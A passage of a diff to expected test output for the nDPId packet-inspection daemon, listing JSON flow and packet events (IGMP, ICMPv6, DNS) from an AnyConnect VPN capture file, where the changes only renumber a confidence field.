+00596{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241452,"flow_last_seen":1569687241452,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687241452,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241656,"flow_last_seen":1569687241656,"flow_idle_time":140000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1569687241656,"l3_proto":"ip6","src_ip":"fe80::2e7e:81ff:feb0:4aa1","dst_ip":"ff02::1","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1569687241656,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":174,"pkt_l4_len":120,"thread_ts_msec":1569687241656,"pkt":"MzMAAAABLH6BsEqhht1gAAAAAHg6\/\/6AAAAAAAAALn6B\/\/6wSqH\/AgAAAAAAAAAAAAAAAAABhgBH5kDAALQAAAAAAAAAABkFAAAAAVGAIAEFWP7tAAAAAAAAAAAAASABBVj+7QAAAAAAAAAAAAIDBEDAAAL9HQAC\/R0AAAAAJgEGRoQCRLAAAAAAAAAAABgDAAAAAAC0AAAAAAAAAAAAAAAAAAAAAAEBLH6BsEqh"} -00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241656,"flow_last_seen":1569687241656,"flow_idle_time":140000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1569687241656,"l3_proto":"ip6","src_ip":"fe80::2e7e:81ff:feb0:4aa1","dst_ip":"ff02::1","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241656,"flow_last_seen":1569687241656,"flow_idle_time":140000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1569687241656,"l3_proto":"ip6","src_ip":"fe80::2e7e:81ff:feb0:4aa1","dst_ip":"ff02::1","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00542{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241657,"flow_last_seen":1569687241657,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687241657,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1569687241657,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1569687241657,"pkt":"AQBeAAD7pHczjPFACABGwAAgAABAAAEC+IcKAACV4AAA+5QEAAAWAAkE4AAA+w=="} -00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241657,"flow_last_seen":1569687241657,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687241657,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241657,"flow_last_seen":1569687241657,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687241657,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1569687242068,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687242068,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl95UH0ntZWziAAAAALAC\/\/8\/+wAAAgQFtAEDAwUBAQgKHA1tlQAAAAAEAgAA"} 00543{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242271,"flow_last_seen":1569687242271,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687242271,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.3.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1569687242271,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1569687242271,"pkt":"AQBefwMWpHczjPFACABGwAAgAABAAAEC5m0KAACV7\/8DFpQEAAAWAPbp7\/8DFg=="} -00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242271,"flow_last_seen":1569687242271,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687242271,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.3.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242271,"flow_last_seen":1569687242271,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687242271,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.3.22","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00546{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242476,"flow_last_seen":1569687242476,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687242476,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.255.250","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1569687242476,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1569687242476,"pkt":"AQBef\/\/6pHczjPFACABGwAAgAABAAAEC6YgKAACV7\/\/\/+pQEAAAWAPoE7\/\/\/+g=="} -00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242476,"flow_last_seen":1569687242476,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687242476,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.255.250","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687242476,"flow_last_seen":1569687242476,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687242476,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.255.250","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1569687243071,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687243071,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl95UH0ntZWziAAAAALAC\/\/88EwAAAgQFtAEDAwUBAQgKHA1xfQAAAAAEAgAA"} 00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1569687244524,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":174,"pkt_l4_len":120,"thread_ts_msec":1569687244524,"pkt":"MzMAAAABLH6BsEqhht1gAAAAAHg6\/\/6AAAAAAAAALn6B\/\/6wSqH\/AgAAAAAAAAAAAAAAAAABhgBH5kDAALQAAAAAAAAAABkFAAAAAVGAIAEFWP7tAAAAAAAAAAAAASABBVj+7QAAAAAAAAAAAAIDBEDAAAL9HQAC\/R0AAAAAJgEGRoQCRLAAAAAAAAAAABgDAAAAAAC0AAAAAAAAAAAAAAAAAAAAAAEBLH6BsEqh"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245251,"flow_last_seen":1569687245251,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687245251,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":52879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1569687245251,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1569687245251,"pkt":"LH6BsEqhNDY7z3UoCABFAABE1h4AAP8RQxAKAADjS0tMTM6PADUAMDW7jEkBAAABAAAAAAAAA3ZjbwdwYW5kaW9uBnZpYXNhdANjb20AAAEAAQ=="} -00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245251,"flow_last_seen":1569687245251,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687245251,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":52879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245251,"flow_last_seen":1569687245251,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687245251,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":52879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1569687245288,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1569687245288,"pkt":"NDY7z3UoLH6BsEqhCABFAABUAABAADYRoh9LS0xMCgAA4wA1zo8AQIZKjEmBgAABAAEAAAAAA3ZjbwdwYW5kaW9uBnZpYXNhdANjb20AAAEAAcAMAAEAAQAAADwABAglZls="} -00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687245251,"flow_last_seen":1569687245288,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1569687245288,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":52879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"8.37.102.91"}} +00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687245251,"flow_last_seen":1569687245288,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1569687245288,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":52879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"8.37.102.91"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245295,"flow_last_seen":1569687245295,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687245295,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1569687245295,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1569687245295,"pkt":"LH6BsEqhNDY7z3UoCABFAABE77wAAEAR6XMKAADjS0tLS+\/LADUAMHT3LLcBAAABAAAAAAAAA3ZjbwdwYW5kaW9uBnZpYXNhdANjb20AABwAAQ=="} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245295,"flow_last_seen":1569687245295,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687245295,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245295,"flow_last_seen":1569687245295,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687245295,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1569687245320,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":163,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":163,"pkt_l4_len":129,"thread_ts_msec":1569687245320,"pkt":"NDY7z3UoLH6BsEqhCABFAACVAABAADoRnt9LS0tLCgAA4wA178sAgY60LLeBgAABAAAAAQAAA3ZjbwdwYW5kaW9uBnZpYXNhdANjb20AABwAAcAYAAYAAQAAA4QARQZucy02MzIJYXdzZG5zLTE1A25ldAARYXdzZG5zLWhvc3RtYXN0ZXIGYW1hem9uwB8AAAABAAAcIAAAA4QAEnUAAAFRgA=="} -00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":20,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687245295,"flow_last_seen":1569687245320,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1569687245320,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":20,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687245295,"flow_last_seen":1569687245320,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1569687245320,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245321,"flow_last_seen":1569687245321,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687245321,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":62322,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1569687245321,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1569687245321,"pkt":"LH6BsEqhNDY7z3UoCABFAABEwHQAAEARF7sKAADjS0tMTPNyADUAMHBPLLcBAAABAAAAAAAAA3ZjbwdwYW5kaW9uBnZpYXNhdANjb20AABwAAQ=="} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245321,"flow_last_seen":1569687245321,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687245321,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":62322,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245321,"flow_last_seen":1569687245321,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687245321,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":62322,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1569687245366,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":163,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":163,"pkt_l4_len":129,"thread_ts_msec":1569687245366,"pkt":"NDY7z3UoLH6BsEqhCABFAACVAABAADYRod5LS0xMCgAA4wA183IAgYoMLLeBgAABAAAAAQAAA3ZjbwdwYW5kaW9uBnZpYXNhdANjb20AABwAAcAYAAYAAQAAA4QARQZucy02MzIJYXdzZG5zLTE1A25ldAARYXdzZG5zLWhvc3RtYXN0ZXIGYW1hem9uwB8AAAABAAAcIAAAA4QAEnUAAAFRgA=="} -00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687245321,"flow_last_seen":1569687245366,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1569687245366,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":62322,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687245321,"flow_last_seen":1569687245366,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1569687245366,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":62322,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vco.pandion.viasat.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 